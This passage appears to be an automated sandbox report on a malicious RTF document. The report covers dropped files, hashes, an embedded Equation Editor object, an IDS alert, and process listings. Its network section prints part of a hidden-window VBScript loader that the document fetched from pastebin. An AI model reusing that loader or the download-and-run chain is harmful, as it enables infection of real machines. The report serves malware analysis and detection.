SHA-512:	BB1FE94A523EF108C49F75DA187FCC28BBF80D72233454C329134BEE2E12268D3DA344A622987B081612AA2A1EDAC8B91EEF27619C7309517AC52E7AEBF32F1A
Malicious:	false
Preview:	..function OnLoad()..{.. ViewPanel.addBehavior("#default#mmcview");.. MMCEvents.ConnectTo(external.Document.Application);.. UpdateState();..}....// Prevent text from being selected and messing up the UI...function document.onselectstart()..{.. event.returnValue = false;..}....function UpdateState()..{.. var strDetails = "";.. var strDisplayName = "";.. var strDescription = "";.. var i;.. var curnode;.. var strNodeType;.... N = external.Selection;.... switch(N.count).. {.. case 0:.. DisplayNameElem.style.fontWeight="normal";.. strDetails = "";.. strDisplayName = L_strNoItemSelected_Text;.. break;.... case 1:.. DisplayNameElem.style.fontWeight="bold";.. strDetails = "";.. curNode = N(1);.... // got the selected node.. strNodeType = curNode.Nodetype;.. strDisplayName = external.CellContents(curNode, 1);.. strDescription = curNode.Property("CCF_DESCRIPTION");..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\views[1]

Download File

Process:	C:\Windows\System32\mmc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1835
Entropy (8bit):	4.8246355222783786
Encrypted:	false
SSDEEP:	48:1QuIGYwCQ73ZOaFibdMpn1c2CqWMwr8Qp5lAh:SncJO8ZDru9S
MD5:	BEE1758A485085BB8A121EB74BA7E96F
SHA1:	8024492E1126B17F832E36C932D433200180B693
SHA-256:	EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E
SHA-512:	BB1FE94A523EF108C49F75DA187FCC28BBF80D72233454C329134BEE2E12268D3DA344A622987B081612AA2A1EDAC8B91EEF27619C7309517AC52E7AEBF32F1A
Malicious:	false
Preview:	..function OnLoad()..{.. ViewPanel.addBehavior("#default#mmcview");.. MMCEvents.ConnectTo(external.Document.Application);.. UpdateState();..}....// Prevent text from being selected and messing up the UI...function document.onselectstart()..{.. event.returnValue = false;..}....function UpdateState()..{.. var strDetails = "";.. var strDisplayName = "";.. var strDescription = "";.. var i;.. var curnode;.. var strNodeType;.... N = external.Selection;.... switch(N.count).. {.. case 0:.. DisplayNameElem.style.fontWeight="normal";.. strDetails = "";.. strDisplayName = L_strNoItemSelected_Text;.. break;.... case 1:.. DisplayNameElem.style.fontWeight="bold";.. strDetails = "";.. curNode = N(1);.... // got the selected node.. strNodeType = curNode.Nodetype;.. strDisplayName = external.CellContents(curNode, 1);.. strDescription = curNode.Property("CCF_DESCRIPTION");..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\views[1]

Download File

Process:	C:\Windows\System32\mmc.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3413
Entropy (8bit):	5.084486589571248
Encrypted:	false
SSDEEP:	48:4pPowKI58aHF/Au4Azk2qKz7+DomFh9I5G6XNl1wv6s6v7T2M4dl4qbR/s1:pkmaHF/ESzCn2vE6seCP4aR/s1
MD5:	A726593A8261930E4786375106FC6BFE
SHA1:	13916B1E1825549E9C36C64E35BACA204A83EF95
SHA-256:	E6BFDFBB9A0649EA9D38DE4255C355C581097E6A1035A54943260B22AD45F172
SHA-512:	B093A2513B2C4F8544093D6E983EC580E14625E1529BC3DB22C4011980CDF44A78443C22289B11A6ED0AFAE2786D480F94B354B71496EE022E439D2BDEFBEDD2
Malicious:	false
Preview:	<html>.... <head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">.. <style>.. body {margin: 0; font: icon; color: windowtext; background:window; overflow:none}.. span {font:icon;}.. #FolderIcon {height:expression(TaskpadName.clientHeight + 10); width:100%;}.. #TaskpadName {font: caption; color:captiontext; margin-left:0; margin-right:0; margin-top: 0; width:100%; border:0; padding-left:3; padding-top:5; padding-bottom:7;}.. #DisplayNameElem {font:icon; padding-left:5px; padding-top:5px; padding-bottom:3px; padding-right:5px}.. #Details {padding-left: 12px; margin-top: 8px; overflow:auto}.. #DescriptionElem {padding-left: 12px; margin-top: 8px; overflow-y:scroll; overflow:auto}.. A:visited {color:expression(document.linkColor);}.. A:hover {color:expression(document.linkColor);}.. </style>.... <script language="javascript">.. var L_strNoItemSelected_Text

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\Desktop\~$test.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	4.321219506825332
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	test.doc
File size:	2'177 bytes
MD5:	f5fc224eb5cbbff8ee4bf4670ed9611a
SHA1:	8e3f85dd6fb94da77990987bd26bde7e59042490
SHA256:	80f7f23bea03b2386ae91e156835c2a685d9515e0c42f4dd89f782d64a29f701
SHA512:	4902cd1f9f166a2bc3136276e2baf251e40dc196885be38e8b38f034fa9829b390c82a9ea9474cb11c3f84460997540489a3455d327ae62ae7f95f78131f8330
SSDEEP:	48:TDvLnzDXi5xokbzjEsTG6en2HwDEEEEEEEEEEd:TDvLPSxJFC/2sEEEEEEEEEEd
TLSH:	4341704405DE94C0FC1128A32416B3B3817BFD3A36C45900B4E4D3C0FA5A90A087BEAE
File Content Preview:	{\rtf1..{\^\rtf\object\objocx\198923813}{.\object{\.\rtf\object\objocx\198923813}{.\objocx.{\^\rtf\object\objocx\198923813}\objdata..a0b0d1c1020000000C0000004{\.\rtf\object\objwindupdates\198923813}551556174496F6E2{\.\rtf\object\objocx\198923813}e3{\.\rtf

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000007Fh	2	embedded	EQUatIon.2	876				no

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T17:15:09.259053+0200	2027374	ET MALWARE Unknown VBScript Loader with Encoded PowerShell Execution Inbound	1	104.20.4.235	443	192.168.2.22	49161	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 17:15:07.329972029 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:07.330066919 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:07.330178976 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:07.342709064 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:07.342749119 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:07.829035044 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:07.829200983 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:07.834789038 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:07.834847927 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:07.835349083 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:07.835505009 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:07.904067039 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:07.947416067 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:09.258347034 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:09.258464098 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:09.258507013 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:09.258536100 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:09.258564949 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:09.258594036 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:09.258636951 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:09.258698940 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:09.258729935 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:09.258780956 CEST	443	49161	104.20.4.235	192.168.2.22
Oct 13, 2024 17:15:09.258794069 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:09.258835077 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:09.261720896 CEST	49161	443	192.168.2.22	104.20.4.235
Oct 13, 2024 17:15:09.261754036 CEST	443	49161	104.20.4.235	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 17:15:07.309139967 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 13, 2024 17:15:07.318932056 CEST	53	54562	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 17:15:07.309139967 CEST	192.168.2.22	8.8.8.8	0xd682	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 17:15:07.318932056 CEST	8.8.8.8	192.168.2.22	0xd682	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:15:07.318932056 CEST	8.8.8.8	192.168.2.22	0xd682	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:15:07.318932056 CEST	8.8.8.8	192.168.2.22	0xd682	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	104.20.4.235	443	3368	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-13 15:15:07 UTC	335	OUT	GET /raw/JtdAmHD5 HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: pastebin.com Connection: Keep-Alive
2024-10-13 15:15:09 UTC	388	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:15:08 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sun, 13 Oct 2024 15:15:08 GMT Server: cloudflare CF-RAY: 8d204886bf250f49-EWR
2024-10-13 15:15:09 UTC	981	IN	Data Raw: 35 64 63 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 46 75 6e 63 74 69 6f 6e 20 76 61 72 5f 42 65 69 6e 6a 61 6d 61 6e 28 29 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 31 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 32 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 33 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 34 0d 0a 20 20 20 20 20 20 20 20 53 65 74 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 35 0d 0a 09 Data Ascii: 5dc<script language="VBScript"> Function var_Beinjaman() Dim Dunjalar1212Dim Dunjalar12121Dim Dunjalar12122Dim Dunjalar12123Dim Dunjalar12124 Set Dunjalar1212 = CreateObject("Wscript.Shell")Dim Dunjalar12125
2024-10-13 15:15:09 UTC	526	IN	Data Raw: 09 43 6f 6e 73 74 20 48 49 44 44 45 4e 5f 57 49 4e 44 4f 57 20 3d 20 31 32 0d 0a 09 53 65 74 20 4c 6f 63 61 74 6f 72 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 62 65 6d 53 63 72 69 70 74 69 6e 67 2e 53 57 62 65 6d 4c 6f 63 61 74 6f 72 22 29 0d 0a 09 53 65 74 20 53 65 72 76 69 63 65 20 3d 20 4c 6f 63 61 74 6f 72 2e 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 28 29 0d 0a 09 53 65 72 76 69 63 65 2e 53 65 63 75 72 69 74 79 5f 2e 49 6d 70 65 72 73 6f 6e 61 74 69 6f 6e 4c 65 76 65 6c 3d 69 6d 70 65 72 73 6f 6e 61 74 69 6f 6e 0d 0a 09 53 65 74 20 6f 62 6a 53 74 61 72 74 75 70 20 3d 20 53 65 72 76 69 63 65 2e 47 65 74 28 22 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 53 74 61 72 74 75 70 22 29 0d 0a 09 53 65 74 20 6f 62 6a 43 6f 6e 66 69 67 20 3d 20 6f 62 6a 53 Data Ascii: Const HIDDEN_WINDOW = 12Set Locator = CreateObject("WbemScripting.SWbemLocator")Set Service = Locator.ConnectServer()Service.Security_.ImpersonationLevel=impersonationSet objStartup = Service.Get("Win32_ProcessStartup")Set objConfig = objS
2024-10-13 15:15:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:15:02
Start date:	13/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13ffc0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:15:04
Start date:	13/10/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	11:16:04
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:16:11
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	11:16:14
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:16:18
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	11:16:25
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:16:30
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	11:16:35
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:16:36
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	11:16:45
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:16:49
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	11:16:55
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:17:01
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	11:17:05
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:17:09
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	11:17:15
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:17:15
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	11:17:25
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:17:29
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	11:17:35
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:17:41
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	11:17:45
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:17:49
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	11:17:55
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:17:56
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	11:18:06
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:18:10
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	11:18:16
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:18:17
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	11:18:26
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
Imagebase:	0xffc80000
File size:	257'024 bytes
MD5 hash:	09F7401D56F2393C6CA534FF0241A590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:18:31
Start date:	13/10/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Imagebase:	0xff220000
File size:	2'144'256 bytes
MD5 hash:	9FEA051A9585F2A303D55745B4BF63AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	11:18:36
Start date:	13/10/2024
Path:	C:\Windows\System32\taskmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\taskmgr.exe"
